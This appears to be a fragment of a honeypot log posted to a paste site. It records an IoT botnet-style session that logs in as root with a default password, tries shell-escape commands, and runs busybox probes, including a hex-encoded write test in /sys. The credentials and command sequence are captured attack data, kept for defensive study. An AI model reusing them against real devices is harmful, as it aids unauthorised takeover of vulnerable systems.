- "timestamp": "2019-08-06T17:34:22.865Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' \u003e /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon",
- "timestamp": "2019-08-06T17:34:22.859Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox cat /proc/mounts; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:34:22.617Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox ps; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:34:22.375Z"
- },
- {
- "eventid": "command.input",
- "input": "bash",
- "timestamp": "2019-08-06T17:34:21.3Z"
- },
- {
- "eventid": "command.input",
- "input": "terminal",
- "timestamp": "2019-08-06T17:34:21.298Z"
- },
- {
- "eventid": "command.input",
- "input": "linuxshell",
- "timestamp": "2019-08-06T17:34:21.296Z"
- },
- {
- "eventid": "command.input",
- "input": "sh",
- "timestamp": "2019-08-06T17:34:21.295Z"
- },
- {
- "eventid": "command.input",
- "input": "shell",
- "timestamp": "2019-08-06T17:34:21.292Z"
- },
- {
- "eventid": "command.input",
- "input": "enable",
- "timestamp": "2019-08-06T17:34:21.043Z"
- },
- {
- "eventid": "login.success",
- "geoip": {
- "city_name": "",
- "country_name": "Netherlands"
- },
- "password": "linuxshell",
- "timestamp": "2019-08-06T17:34:20.385Z",
- "username": "root"
- }
- ]
- }
- }
Add Comment
Please, Sign In to add comment